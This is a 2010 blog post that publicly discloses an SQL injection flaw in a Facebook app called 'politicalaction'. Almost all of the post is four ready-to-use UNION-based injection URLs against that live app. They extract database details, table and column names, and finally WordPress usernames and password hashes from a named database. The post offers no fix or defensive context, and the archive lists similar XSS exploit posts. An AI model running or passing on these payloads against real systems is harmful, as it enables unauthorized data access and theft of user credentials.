FbAppz-BugReport

Tuesday, July 20, 2010

Facebook politicalaction app Sqli Exploit

The Facebook politicalaction app suffers from sqli which can reveal a lot of info to the attackers.



Here are few codes which i am posting

1.Getting Basic Info :
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2CCONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1

2.Getting the List of Tables:
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

3.Getting the Columns
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

4.Getting Wordpress user-names and passwords:

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
12 hours ago · Delete Post
Posted by OpenMindLeader at 8:48 PM
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

No comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

Blog Archive

  • ▼  2010 (7)
    • ▼  July (7)
      • Facebook Music app Persistent Xss Vuln
      • Facebook movies by Flixster Persistent XSS Exploit
      • Facebook movies by Flixster(search option) xss vuln
      • Facebook Quiz Monster Persistent XSS Exploit
      • FB NetworkedBlogs App Persistent XSS Exploit
      • Facebook politicalaction app Sqli Exploit
      • About FbAppz-BugReport
Awesome Inc. theme. Powered by Blogger.